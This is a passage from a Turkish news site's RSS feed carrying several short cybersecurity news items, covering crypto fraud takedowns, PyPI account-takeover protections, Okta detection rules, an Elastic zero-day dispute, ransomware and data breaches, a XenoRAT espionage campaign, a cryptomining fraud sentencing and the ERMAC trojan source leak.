<p data-start="1463" data-end="1842"><strong data-start="1463" data-end="1502">Kanada ve ABD merkezli operasyonlar</strong><br data-start="1502" data-end="1505">Diğer girişim ise ABD ve Kanada’nın yürüttüğü, Chainalysis uzmanlarının destek verdiği operasyonlarla gerçekleşti. Ontario Eyalet Polisi tarafından yürütülen “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu tarafından yönetilen “Operation Avalanche” kapsamında, son altı ayda 74,3 milyon dolarlık kayıp tespit edildi.</p>
<p data-start="1844" data-end="2113">Chainalysis verilerine göre, bu operasyonlar kapsamında 14 farklı ülkede 2.000’den fazla kripto cüzdan adresi belirlendi. Tether ile yapılan iş birliği sayesinde 50 milyon dolardan fazla USDT kara listeye alındı ve suçluların bu varlıkları nakde çevirmesi engellendi.</p>
<p data-start="2115" data-end="2309">Uzmanlara göre, bu tür küresel iş birlikleri, siber suçların finansman kaynaklarını kurutma ve suç gelirlerinin dolaşımını blockchain üzerinde doğrudan engelleme açısından kritik önem taşıyor.</p>
<p data-start="2311" data-end="2522"><strong data-start="2311" data-end="2323"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>PyPI, hesap ele geçirmede kullanılan alan adı yeniden canlandırma saldırılarını engelleyen yeni güvenlik önlemleri getirdi</title>
<link>https://www.ajansexpres.com.tr/pypi-hesap-ele-gecirmede-kullanilan-alan-adi-yeniden-canlandirma-saldirilarini-engelleyen-yeni-guvenlik-oenlemleri-getirdi</link>
<guid>https://www.ajansexpres.com.tr/pypi-hesap-ele-gecirmede-kullanilan-alan-adi-yeniden-canlandirma-saldirilarini-engelleyen-yeni-guvenlik-oenlemleri-getirdi</guid>
<description><![CDATA[ Python ekosisteminin resmi paket deposu PyPI, alan adı süresi dolduğunda saldırganların e-posta adreslerini ele geçirip hesaplara erişmesine olanak tanıyan saldırı türüne karşı yeni korumalar uygulamaya başladı. Haziran 2025’ten bu yana günlük taramalarla 1.800’den fazla e-posta adresi doğrulamasını kaybetti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc13b1870.webp" length="64032" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:27 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p data-start="493" data-end="719">Açık kaynak Python paketlerinin resmi deposu olan Python Package Index (PyPI), alan adı süresi dolan e-posta adreslerini kullanarak gerçekleştirilen hesap ele geçirme saldırılarına karşı yeni güvenlik önlemleri devreye aldı.</p>
<p data-start="721" data-end="1129"><strong data-start="721" data-end="754">Saldırı yöntemi nasıl işliyor</strong><br data-start="754" data-end="757">PyPI üzerindeki proje geliştiricilerinin hesapları, e-posta adresleriyle bağlantılı olarak çalışıyor. Bazı adresler özel alan adlarına bağlı olduğunda, bu alan adı süresi dolduğunda saldırganlar aynı alan adını yeniden kaydedebiliyor. Sonrasında bir e-posta sunucusu kurarak parola sıfırlama talebinde bulunabiliyor ve ilgili PyPI hesabının kontrolünü ele geçirebiliyor.</p>
<p data-start="1131" data-end="1464">Bu tür saldırılar tedarik zinciri riski yaratıyor. Ele geçirilen hesaplarla popüler Python paketlerinin kötü amaçlı sürümleri yayımlanabiliyor ve bu paketler <code data-start="1289" data-end="1294">pip</code> üzerinden otomatik yüklenebiliyor. Daha önce Mayıs 2022’de “ctx” paketine yapılan saldırıda saldırganlar Amazon AWS anahtarlarını hedef alan kötü amaçlı kod eklemişti.</p>
<p data-start="1466" data-end="1816"><strong data-start="1466" data-end="1489">Yeni koruma sistemi</strong><br data-start="1489" data-end="1492">PyPI, alan adlarının yaşam döngüsünü (aktif, ek süre, kurtarma süresi, silinme beklemede) Domainr’ın Status API servisini kullanarak kontrol ediyor. Alan adı süresi dolmuş veya sona erme aşamasına girmişse, bu e-posta adresleri doğrulamasını kaybediyor ve parola sıfırlama ya da hesap kurtarma işlemlerinde kullanılamıyor.</p>
<p data-start="1818" data-end="2004">Yeni sistemin geliştirilmesi Nisan 2025’te başladı ve Haziran 2025’te günlük taramalarla devreye alındı. O tarihten bu yana 1.800’den fazla e-posta adresi bu kapsamda geçersiz sayıldı.</p>
<p data-start="2006" data-end="2227"><strong data-start="2006" data-end="2032">Kullanıcılara öneriler</strong><br data-start="2032" data-end="2035">PyPI, kullanıcıların hesaplarına özel alan adı yerine genel e-posta servislerinden yedek bir adres eklemelerini ve hesap güvenliği için iki faktörlü kimlik doğrulama kullanmalarını öneriyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Okta, Auth0 kullanıcıları için hesap ele geçirme ve tehdit tespiti amacıyla açık kaynaklı kurallar kataloğu yayımladı</title>
<link>https://www.ajansexpres.com.tr/okta-auth0-kullanicilari-icin-hesap-ele-gecirme-ve-tehdit-tespiti-amaciyla-acik-kaynakli-kurallar-katalogu-yayimladi</link>
<guid>https://www.ajansexpres.com.tr/okta-auth0-kullanicilari-icin-hesap-ele-gecirme-ve-tehdit-tespiti-amaciyla-acik-kaynakli-kurallar-katalogu-yayimladi</guid>
<description><![CDATA[ Kimlik ve erişim yönetimi platformu Auth0’nun geliştiricisi Okta, şüpheli davranışların tespitini kolaylaştırmak için Sigma tabanlı hazır sorgular içeren açık kaynaklı bir kurallar kataloğunu kullanıma sundu. Yeni sistem, hesap ele geçirme girişimleri, sahte yönetici hesapları, SMS bombardımanı ve token hırsızlığı gibi tehditlerin log analizlerinde erken fark edilmesine yardımcı olacak. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc0df41bb.webp" length="34894" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:21 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="567" data-end="929">Okta, Auth0 kullanıcılarının güvenlik tehditlerini daha hızlı tespit edebilmesi için Sigma tabanlı kurallardan oluşan açık kaynaklı bir “Customer Detection Catalog” yayımladı. Yeni kurallar seti, şüpheli etkinliklerin log kayıtları üzerinden daha kolay analiz edilmesini sağlayarak hesap ele geçirme ve yapılandırma hataları gibi risklere karşı koruma sunuyor.</p>
<p data-start="931" data-end="1301"><strong data-start="931" data-end="962">Yeni katalog neler içeriyor</strong><br data-start="962" data-end="965">Auth0, dünya genelinde birçok kurum tarafından kimlik doğrulama ve kullanıcı yönetimi amacıyla kullanılan bir platform. Daha önce kullanıcıların şüpheli aktiviteleri tespit etmek için kendi kurallarını yazmaları gerekiyordu. Okta’nın yayımladığı katalog ise, topluluk katkısına açık şekilde sürekli güncellenen hazır sorgular sunuyor.</p>
<p data-start="1303" data-end="1632">Şirketin açıklamasına göre bu kurallar, anormal kullanıcı davranışlarını, potansiyel hesap ele geçirmelerini, hatalı yapılandırmaları ve sahte yönetici hesaplarının oluşturulmasını ortaya çıkarabiliyor. Ayrıca SMS bombardımanı ve token hırsızlığı gibi saldırı yöntemlerinin log kayıtları üzerinden izlenmesine de imkan tanıyor.</p>
<p data-start="1634" data-end="1969"><strong data-start="1634" data-end="1653">Kullanım süreci</strong><br data-start="1653" data-end="1656">Kullanıcılar, kurallara GitHub üzerinden erişebiliyor. Sigma uyumlu sorgular, <code data-start="1734" data-end="1745">sigma-cli</code> gibi dönüştürücüler aracılığıyla farklı SIEM veya log analiz sistemlerine uyarlanabiliyor. Kurallar önce geçmiş loglar üzerinde test edilerek yanlış pozitif sonuçlar ayıklanabiliyor, ardından canlı ortama aktarılabiliyor.</p>
<p data-start="1971" data-end="2160">Okta, kullanıcıların kendi geliştirdikleri kuralları da GitHub deposuna “pull request” yoluyla ekleyebileceğini, böylece topluluk temelli bir güvenlik katmanı oluşturulacağını belirtiyor.</p>
<p data-start="2162" data-end="2426"><strong data-start="2162" data-end="2174"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Elastic, Defend EDR ürünü için öne sürülen sıfır gün RCE güvenlik açığı iddialarını reddetti</title>
<link>https://www.ajansexpres.com.tr/elastic-defend-edr-urunu-icin-oene-surulen-sifir-gun-rce-guvenlik-acigi-iddialarini-reddetti</link>
<guid>https://www.ajansexpres.com.tr/elastic-defend-edr-urunu-icin-oene-surulen-sifir-gun-rce-guvenlik-acigi-iddialarini-reddetti</guid>
<description><![CDATA[ Elastic, AshES Cybersecurity tarafından yayımlanan ve Defend EDR ürününde uzaktan kod çalıştırmaya imkan veren sıfır gün açığı bulunduğu iddiasını doğrulamadı. Şirket, yaptığı incelemelerde iddiayı destekleyecek kanıtlara rastlamadığını ve araştırmacının tekrarlanabilir bir PoC paylaşmadığını açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc09108e2.webp" length="35678" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:16 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p data-start="456" data-end="698">Kurumsal arama ve güvenlik şirketi Elastic, Defend EDR ürününde kritik bir sıfır gün güvenlik açığı bulunduğu yönündeki iddiaları reddetti. Açıklama, 16 Ağustos’ta AshES Cybersecurity tarafından yayımlanan bir blog yazısının ardından geldi.</p>
<p data-start="700" data-end="1139"><strong data-start="700" data-end="712">İddialar</strong><br data-start="712" data-end="715">AshES Cybersecurity, Elastic Defend’in <code data-start="754" data-end="783">elastic-endpoint-driver.sys</code> adlı sürücüsünde NULL pointer dereference hatası bulunduğunu, bunun da EDR korumasını atlatmaya, uzaktan kod yürütmeye ve kalıcılık sağlamaya yol açabileceğini öne sürdü. Araştırmacı, kendi hazırladığı sürücü ile bu hatayı tetiklediğini, Windows’un çökmesini ve <code data-start="1046" data-end="1056">calc.exe</code> dosyasının EDR tarafından engellenmeden açılmasını gösteren iki video yayımladı.</p>
<p data-start="1141" data-end="1428"><strong data-start="1141" data-end="1162">Elastic’in yanıtı</strong><br data-start="1162" data-end="1165">Elastic Güvenlik Mühendisliği ekibi, iddiaları inceleyerek rapor edilen açığın yeniden üretilemediğini belirtti. Şirket, AshES tarafından gönderilen raporların tekrarlanabilir bir sömürü kanıtı içermediğini ve araştırmacının PoC paylaşmayı reddettiğini duyurdu.</p>
<p data-start="1430" data-end="1708">Elastic açıklamasında, güvenlik araştırmalarında koordineli açıklamanın esas olduğunu, ancak bu raporda sürecin takip edilmediğini vurguladı. Şirket, 2017’den bu yana hata ödül programı kapsamında güvenlik araştırmacılarına 600.000 dolardan fazla ödeme yapıldığını hatırlattı.</p>
<p data-start="1710" data-end="1915"><strong data-start="1710" data-end="1722"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD’li ilaç firması Inotiv, Qilin fidye yazılımı saldırısının işleyişi etkilediğini açıkladı</title>
<link>https://www.ajansexpres.com.tr/abdli-ilac-firmasi-inotiv-qilin-fidye-yazilimi-saldirisinin-isleyisi-etkiledigini-acikladi</link>
<guid>https://www.ajansexpres.com.tr/abdli-ilac-firmasi-inotiv-qilin-fidye-yazilimi-saldirisinin-isleyisi-etkiledigini-acikladi</guid>
<description><![CDATA[ Indiana merkezli ilaç araştırma şirketi Inotiv, 8 Ağustos’ta gerçekleşen fidye yazılım saldırısında bazı sistem ve verilerinin şifrelenmesi nedeniyle iş süreçlerinde aksama yaşandığını duyurdu. Qilin grubu saldırının sorumluluğunu üstlenerek 176 GB büyüklüğünde yaklaşık 162 bin dosya çaldığını iddia etti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc04029d1.webp" length="56106" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:11 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="459" data-end="808">ABD’nin Indiana eyaletinde faaliyet gösteren ilaç şirketi Inotiv, 8 Ağustos 2025’te gerçekleşen bir fidye yazılım saldırısının şirketin operasyonlarını etkilediğini açıkladı. U.S. Securities and Exchange Commission (SEC) başvurusunda paylaşılan bilgilere göre saldırganlar, şirketin bazı sistemlerine yetkisiz erişim sağladı ve verileri şifreledi.</p>
<p data-start="810" data-end="1039"><strong data-start="810" data-end="838">Saldırıyı Qilin üstlendi</strong><br data-start="838" data-end="841">Qilin fidye yazılım grubu, saldırıyı kendi sızıntı sitesinde duyurarak yaklaşık 176 GB büyüklüğünde 162.000 dosyayı ele geçirdiğini öne sürdü. Grup, çaldığı verilerden bazı örnekleri de yayımladı.</p>
<p data-start="1041" data-end="1388"><strong data-start="1041" data-end="1060">Alınan önlemler</strong><br data-start="1060" data-end="1063">Inotiv, olayın ardından harici siber güvenlik uzmanlarıyla birlikte soruşturma başlattı ve kolluk kuvvetlerini bilgilendirdi. Şirketin IT ekibi, etkilenen sistemleri yeniden işler hale getirmek için çalışmalar yürütüyor. Bazı iş süreçleri ise çevrimdışı alternatiflere taşınarak kesintilerin etkisi azaltılmaya çalışılıyor.</p>
<p data-start="1390" data-end="1634">Şirket, saldırının veritabanları ve iş süreçlerinde kullanılan bazı iç uygulamaları etkilediğini, bu nedenle operasyonlarda aksaklıkların bir süre daha devam etmesini beklediklerini duyurdu. Normal işleyişe dönüş için net bir tarih verilmedi.</p>
<p data-start="1636" data-end="1930"><strong data-start="1636" data-end="1655">Inotiv hakkında</strong><br data-start="1655" data-end="1658">Yaklaşık 2.000 kişiyi istihdam eden ve yıllık 500 milyon dolardan fazla gelir elde eden Inotiv, ilaç keşfi, geliştirilmesi, güvenlik değerlendirmesi ve canlı hayvan araştırma modelleri konularında uzmanlaşmış bir sözleşmeli araştırma kuruluşu olarak faaliyet gösteriyor.</p>
<p data-start="1932" data-end="2175"><strong data-start="1932" data-end="1944"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>New York İş Konseyi, 47 binden fazla kişiyi etkileyen veri ihlalini açıkladı</title>
<link>https://www.ajansexpres.com.tr/new-york-is-konseyi-47-binden-fazla-kisiyi-etkileyen-veri-ihlalini-acikladi</link>
<guid>https://www.ajansexpres.com.tr/new-york-is-konseyi-47-binden-fazla-kisiyi-etkileyen-veri-ihlalini-acikladi</guid>
<description><![CDATA[ New York Eyaleti’nin en büyük işveren derneği olan Business Council of New York State (BCNYS), Şubat ayında gerçekleşen siber saldırıda 47.329 kişinin kişisel, finansal ve sağlık bilgilerinin ele geçirildiğini duyurdu. İhlal altı ay sonra tespit edildi ve etkilenenlere bilgilendirme mektupları gönderilmeye başlandı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbfea5ec3.webp" length="51792" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:06 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p data-start="454" data-end="770">Business Council of New York State (BCNYS), Şubat 2025’te yaşanan bir siber saldırının ardından 47 binden fazla kişinin bilgilerinin çalındığını açıkladı. ABD Maine Başsavcılığı’na yapılan resmi bildirimde, saldırganların 24-25 Şubat tarihleri arasında kurumun iç sistemlerine yetkisiz erişim sağladığı belirtildi.</p>
<p data-start="772" data-end="1007"><strong data-start="772" data-end="803">Altı ay sonra tespit edildi</strong><br data-start="803" data-end="806">BCNYS, saldırıyı yaklaşık altı ay sonra, 4 Ağustos’ta fark etti. Yapılan incelemelerde, tehdit aktörlerinin kişisel, finansal ve sağlık bilgilerini içeren dosyalara erişerek kopyaladığı ortaya çıktı.</p>
<p data-start="1009" data-end="1400"><strong data-start="1009" data-end="1028">Çalınan veriler</strong><br data-start="1028" data-end="1031">Etkilenen bilgiler arasında ad-soyad, Sosyal Güvenlik numarası, doğum tarihi, eyalet kimlik numarası, banka ve hesap bilgileri, kredi kartı numarası, PIN kodları, kart son kullanma tarihleri ve vergi mükellefi kimlik numaraları yer alıyor. Ayrıca tıbbi sağlayıcı adı, teşhis ve tedavi bilgileri, reçete bilgileri ve sağlık sigortası verileri de saldırıda ifşa edildi.</p>
<p data-start="1402" data-end="1746"><strong data-start="1402" data-end="1421">Alınan önlemler</strong><br data-start="1421" data-end="1424">BCNYS, olayın ardından dış uzmanlardan destek alarak sistemlerini güvenceye aldığını ve kapsamlı bir soruşturma başlattığını açıkladı. Şimdiye kadar finansal dolandırıcılık veya kimlik hırsızlığına dair kanıt bulunmadığı ifade edildi. Sosyal Güvenlik numarası ifşa olan kişilere ücretsiz kredi izleme hizmeti sağlanacak.</p>
<p data-start="1748" data-end="1875">Kurum, etkilenen bireyleri hesap ekstrelerini ve ücretsiz kredi raporlarını düzenli olarak kontrol etmeleri konusunda uyardı.</p>
<p data-start="1877" data-end="2095"><strong data-start="1877" data-end="1889"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Allianz Life veri ihlalinde 1,1 milyon kişinin kişisel bilgileri çalındı</title>
<link>https://www.ajansexpres.com.tr/allianz-life-veri-ihlalinde-11-milyon-kisinin-kisisel-bilgileri-calindi</link>
<guid>https://www.ajansexpres.com.tr/allianz-life-veri-ihlalinde-11-milyon-kisinin-kisisel-bilgileri-calindi</guid>
<description><![CDATA[ ABD merkezli sigorta şirketi Allianz Life, Salesforce tabanlı bir veri hırsızlığı saldırısında 1,1 milyon müşterisinin kişisel bilgilerinin ele geçirildiğini açıkladı. ShinyHunters grubu tarafından üstlenilen saldırıda e-posta adresleri, kimlik bilgileri, doğum tarihleri ve iletişim bilgileri sızdırıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbfa25cbb.webp" length="59248" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:22:02 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="438" data-end="718">ABD’de faaliyet gösteren ve Allianz SE’nin iştiraki olan Allianz Life, Temmuz ayında gerçekleşen büyük çaplı bir veri ihlalini doğruladı. Şirketin 1,4 milyon müşterisinin “çoğunluğunu” etkileyen olayda, 1,1 milyon kişinin kişisel bilgileri saldırganlar tarafından ele geçirildi.</p>
<p data-start="720" data-end="1044"><strong data-start="720" data-end="742">Saldırının yöntemi</strong><br data-start="742" data-end="745">Siber saldırı, 16 Temmuz’da üçüncü taraf bulut tabanlı CRM sistemi Salesforce üzerinden gerçekleştirildi. ShinyHunters grubu, çalışanları kandırarak şirketin Salesforce altyapısına kötü amaçlı bir OAuth uygulaması bağladı. Bu erişim üzerinden müşteri ve iş ortaklarına ait veritabanları indirildi.</p>
<p data-start="1046" data-end="1379"><strong data-start="1046" data-end="1065">Çalınan veriler</strong><br data-start="1065" data-end="1068">Sızdırılan bilgiler arasında ad-soyad, e-posta adresi, cinsiyet, doğum tarihi, telefon numarası ve fiziksel adresler yer alıyor. Bazı dosyalarda vergi kimlik numaraları ve diğer finansal bilgiler de bulundu. Veri ihlali bildirim hizmeti <em data-start="1305" data-end="1324">Have I Been Pwned</em>, toplamda 2,8 milyon kaydın sızdırıldığını açıkladı.</p>
<p data-start="1381" data-end="1658"><strong data-start="1381" data-end="1405">ShinyHunters’ın rolü</strong><br data-start="1405" data-end="1408">ShinyHunters grubu, Allianz Life’ın yanı sıra Google, Adidas, Qantas, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Workday gibi birçok büyük kurumu da hedef aldı. Grup, geçmişte Snowflake, AT&T ve PowerSchool gibi saldırılarla da gündeme gelmişti.</p>
<p data-start="1660" data-end="1920"><strong data-start="1660" data-end="1690">Allianz Life’ın açıklaması</strong><br data-start="1690" data-end="1693">Şirket, devam eden soruşturma nedeniyle ayrıntı veremeyeceğini, ancak bazı çalışanların da veri ihlalinden etkilendiğini doğruladı. Allianz Life, etkilenen müşterilerle iletişime geçtiğini ve incelemelerin sürdüğünü bildirdi.</p>
<p data-start="1922" data-end="2168"><strong data-start="1922" data-end="1934"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>XenoRAT zararlı yazılımı Güney Kore’deki yabancı elçilikleri hedef aldı, saldırıların arkasında APT43 şüphesi</title>
<link>https://www.ajansexpres.com.tr/xenorat-zararli-yazilimi-guney-koredeki-yabanci-elcilikleri-hedef-aldi-saldirilarin-arkasinda-apt43-suphesi</link>
<guid>https://www.ajansexpres.com.tr/xenorat-zararli-yazilimi-guney-koredeki-yabanci-elcilikleri-hedef-aldi-saldirilarin-arkasinda-apt43-suphesi</guid>
<description><![CDATA[ Trellix araştırmacılarına göre, Mart 2025’ten bu yana Güney Kore’deki yabancı elçiliklere yönelik en az 19 hedefli kimlik avı saldırısında XenoRAT zararlı yazılımı dağıtıldı. Saldırı teknikleri Kuzey Kore bağlantılı APT43 grubunu işaret ederken, zamanlama ve tatil dönemleri Çin merkezli aktörlere ait izler gösteriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbf54d430.webp" length="32590" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:21:57 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="489" data-end="726">Trellix tarafından yayımlanan rapora göre, devlet destekli olduğu değerlendirilen bir casusluk kampanyası Güney Kore’deki yabancı elçilikleri hedef alıyor. Kampanyada XenoRAT zararlı yazılımı, sahte diplomatik e-postalarla dağıtılıyor.</p>
<p data-start="728" data-end="1043"><strong data-start="728" data-end="754">Çok aşamalı saldırılar</strong><br data-start="754" data-end="757">Saldırılar Mart ayında başladı ve halen devam ediyor. İlk olarak Orta Avrupa’daki bir elçilik hedef alınırken, Mayıs ayında Batı Avrupa elçiliklerine sahte toplantı davetleri gönderildi. Haziran ve Temmuz aylarında ise ABD–Kore askeri iş birliği temalı oltalama e-postaları öne çıktı.</p>
<p data-start="1045" data-end="1319">E-postalar, diplomat kimliğine bürünerek sahte toplantı davetleri, resmi yazılar ve etkinlik çağrıları şeklinde hazırlandı. İçerikler çok dilli olarak Korece, İngilizce, Fransızca, Arapça, Farsça ve Rusça yazıldı ve çoğu zaman gerçek diplomatik etkinliklerle eşleştirildi.</p>
<p data-start="1321" data-end="1677"><strong data-start="1321" data-end="1349">Zararlı yazılım dağıtımı</strong><br data-start="1349" data-end="1352">Saldırganlar, Dropbox, Google Drive ve Daum gibi servislerde barındırılan parola korumalı ZIP dosyaları kullandı. Dosyalarda PDF gibi görünen LNK dosyaları yer aldı. Bu dosyalar çalıştırıldığında gizlenmiş PowerShell komutları devreye girerek GitHub veya Dropbox’tan XenoRAT yükünü indiriyor ve sistemde kalıcılık sağlıyor.</p>
<p data-start="1679" data-end="1919">XenoRAT, tuş kaydı alma, ekran görüntüsü alma, kamera ve mikrofon erişimi, dosya transferi ve uzaktan komut yürütme gibi özelliklere sahip. Bellekte doğrudan yüklenmesi ve Confuser Core ile gizlenmesi sayesinde tespit edilmesi zorlaşıyor.</p>
<p data-start="1921" data-end="2284"><strong data-start="1921" data-end="1960">Kimin arkasında olduğu tartışılıyor</strong><br data-start="1960" data-end="1963">Saldırılarda kullanılan altyapı ve teknikler, Kuzey Kore bağlantılı Kimsuky (APT43) grubunu işaret ediyor. Ancak saldırıların zamanlaması ve tatil dönemlerindeki duraksamalar Çin takvimine uyum gösteriyor. Bu nedenle Trellix, kampanyayı APT43’e “orta düzey güvenle” atfederek Çin desteği ihtimalini de göz ardı etmiyor.</p>
<p data-start="2286" data-end="2516"><strong data-start="2286" data-end="2298"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Nebraska’da bir kişi 3,5 milyon dolarlık kripto madenciliği dolandırıcılığından 1 yıl hapis cezası aldı</title>
<link>https://www.ajansexpres.com.tr/nebraskada-bir-kisi-35-milyon-dolarlik-kripto-madenciligi-dolandiriciligindan-1-yil-hapis-cezasi-aldi</link>
<guid>https://www.ajansexpres.com.tr/nebraskada-bir-kisi-35-milyon-dolarlik-kripto-madenciligi-dolandiriciligindan-1-yil-hapis-cezasi-aldi</guid>
<description><![CDATA[ Nebraska’da yaşayan Charles O. Parks III, bulut bilişim sağlayıcılarını 3,5 milyon dolar dolandırarak yasa dışı kripto madenciliği yaptığı gerekçesiyle 1 yıl hapis cezasına çarptırıldı. Parks, sahte şirketler üzerinden bulut sistemlerinden ücretsiz işlem gücü elde ederek Monero, Ether ve Litecoin üretti, gelirlerini ise lüks araç, mücevher ve seyahatlere harcadı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbf118799.webp" length="45762" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:21:52 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="529" data-end="826">ABD’nin Nebraska eyaletinde yaşayan Charles O. Parks III, “CP3O” takma adıyla yürüttüğü kripto madenciliği operasyonu nedeniyle 1 yıl hapis cezasına mahkum edildi. Parks, iki büyük bulut bilişim sağlayıcısını 3,5 milyon dolar dolandırarak yaklaşık 1 milyon dolar değerinde kripto para elde etti.</p>
<p data-start="828" data-end="1307"><strong data-start="828" data-end="854">Dolandırıcılık yöntemi</strong><br data-start="854" data-end="857">Savcılık belgelerine göre Parks, “CP3O LLC” ve “MultiMillionaire LLC” gibi sahte şirketler kurarak Microsoft ve Amazon merkezli bulut hizmet sağlayıcıları da kapsayan platformlardan yüksek seviyeli işlem gücü aldı. Ocak–Ağustos 2021 arasında faturaları ödemeyerek sağlayıcıların dikkatini farklı bahanelerle dağıttı. Bir şirket yetkililerine, küresel bir çevrimiçi eğitim platformu kurduğunu ve 10 bin öğrenciye hizmet vermeyi planladığını söyledi.</p>
<p data-start="1309" data-end="1697"><strong data-start="1309" data-end="1351">Kripto madenciliği ve kara para aklama</strong><br data-start="1351" data-end="1354">Elde ettiği işlem gücüyle Monero (XMR), Ether (ETH) ve Litecoin (LTC) üreten Parks, kripto varlıklarını çeşitli borsalar, çevrimiçi ödeme hizmetleri, New York merkezli bir NFT pazarı ve banka hesapları üzerinden akladı. Tüm varlıkları nakde çevirerek lüks bir Mercedes-Benz S AMG otomobil, mücevherler ve birinci sınıf seyahatler satın aldı.</p>
<p data-start="1699" data-end="2046"><strong data-start="1699" data-end="1724">Kamuoyuna yansımaları</strong><br data-start="1724" data-end="1727">Savcılık açıklamasında Parks’ın kendisini kripto alanında “inovatif bir düşünce lideri” gibi gösterdiği, ancak gerçekte “yalnızca bir dolandırıcı” olduğu ifade edildi. Parks’ın, 2022’de YouTube kanalında “MultiMillionaire Mentality” başlıklı bir video yayımlayarak sözde zenginlik ipuçlarını paylaştığı da belirtildi.</p>
<p data-start="2048" data-end="2256"><strong data-start="2048" data-end="2060"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ERMAC Android bankacılık truva atının kaynak kodu sızdı, altyapısı ve işleyişi açığa çıktı</title>
<link>https://www.ajansexpres.com.tr/ermac-android-bankacilik-truva-atinin-kaynak-kodu-sizdi-altyapisi-ve-isleyisi-aciga-cikti</link>
<guid>https://www.ajansexpres.com.tr/ermac-android-bankacilik-truva-atinin-kaynak-kodu-sizdi-altyapisi-ve-isleyisi-aciga-cikti</guid>
<description><![CDATA[ Hunt.io araştırmacıları, Mart 2024’te açık bir dizinde keşfettikleri “Ermac 3.0.zip” arşivinde Android tabanlı ERMAC zararlı yazılımının kaynak kodunu buldu. Kod sızıntısı, 700’den fazla uygulamayı hedef alan özelliklerin yanı sıra komuta-kontrol altyapısını, operatör panelini ve trojan oluşturucusunu ortaya çıkardı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cbec65b47.webp" length="32454" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:21:48 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords></media:keywords>
<content:encoded><![CDATA[<p data-start="469" data-end="766">Android cihazları hedef alan ERMAC bankacılık truva atının 3. sürümüne ait kaynak kod çevrimiçi ortamda sızdırıldı. Hunt.io araştırmacıları, 2024 yılı Mart ayında yaptıkları taramalar sırasında açık bırakılmış bir dizinde buldukları arşivi inceleyerek zararlı yazılımın işleyişini açığa çıkardı.</p>
<p data-start="768" data-end="1100"><strong data-start="768" data-end="790">Sızıntının içeriği</strong><br data-start="790" data-end="793">Arşivde zararlının PHP tabanlı komuta-kontrol altyapısı, React ile hazırlanmış operatör paneli, Go dilinde yazılmış veri sızdırma sunucusu, Kotlin tabanlı arka kapı ve özelleştirilmiş APK üreticisi yer aldı. Analizler, ERMAC 3.0’ın önceki sürümlere kıyasla kapsamını önemli ölçüde genişlettiğini gösterdi.</p>
